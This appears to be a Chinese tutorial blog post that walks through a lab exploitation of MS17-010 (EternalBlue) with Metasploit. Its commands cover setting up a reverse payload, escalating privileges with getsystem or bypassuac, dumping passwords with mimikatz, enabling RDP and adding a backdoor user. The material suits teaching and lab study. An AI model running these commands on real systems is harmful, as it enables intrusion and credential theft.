系统漏洞利用过程

1.天镜、nessus、极光等扫描器进行漏洞扫描,跟据漏扫结果去msf里面进行查找漏洞利用工具(这里我以天镜,扫描本机作为一个例子)

系统漏洞利用过程
(只当参考模板用)

2.开msf 通过search搜漏洞编号或漏洞名称

(这里我准备了一个kali和一个Win7虚拟机)

注意:(实验针对漏洞,关掉防火墙!)
系统漏洞利用过程
系统漏洞利用过程

①msfconsole:进入msf控制台

系统漏洞利用过程

②search: 漏洞编号,例如ms17_010

系统漏洞利用过程
(就是之前的永恒之蓝,也就是新闻上报道的比特币勒索病毒)

3.搜到漏洞之后,用use 打开msf漏洞利用工具

use (可以是序号,可以是完整漏洞工具)

系统漏洞利用过程

4.输入info查看工具相关说明

系统漏洞利用过程
(含有该漏洞的操作系统)

5.用show options 查看工具使用方法

系统漏洞利用过程
(可以直观的从参数看出我们的配置项)

6、配置受害者

set payload…配置攻击链接

set rhosts …配置受害者主机

set lhosts …配置监听主机

set lport …配置监听端口

系统漏洞利用过程

7.攻击run 或者exploit

系统漏洞利用过程

8.溢出成功后,如果对方主机是普通用户权限,那么我们用msf里面的getsystem提升权限或者调用exploit/windows/local/bypassuac进行提权(提权有窃取令牌、假冒令牌、操作系统漏洞、getsystem)

系统漏洞利用过程
(一开始我提前创建了一个test的普通用户并登录,但从结果可以看到已经是系统权限(可能是漏洞本身导致的这种现象),同时也进入了受害者主机的命令行模式(meterpreter表示木马模式))

9.当我们提权成功之后获取对方主机管理员用户帐号和密码(load mimikatz wdigest)

系统漏洞利用过程

10.开启rdp&添加用户(run getgui -e #开启远程桌面 run getgui -u lltest2 -p 123456 #添加用户)

系统漏洞利用过程

系统漏洞利用过程
(可以看到远程桌面并没有成功,但是一开始我们就得到了该系统的用户账号密码,这步本质上是没有系统权限,提权以后才需要进行的)

万变不离其宗,漏洞验证就是这种流程,重在理解每个环节的意义~

相关文章:

  • 2021-11-27
  • 2021-08-01
  • 2021-12-22
  • 2021-10-03
  • 2021-06-14
  • 2021-12-31
  • 2021-11-12
  • 2021-10-12
猜你喜欢
  • 2022-12-23
  • 2021-09-22
  • 2021-05-29
  • 2021-10-28
  • 2021-11-23
  • 2021-10-02
相关资源
相似解决方案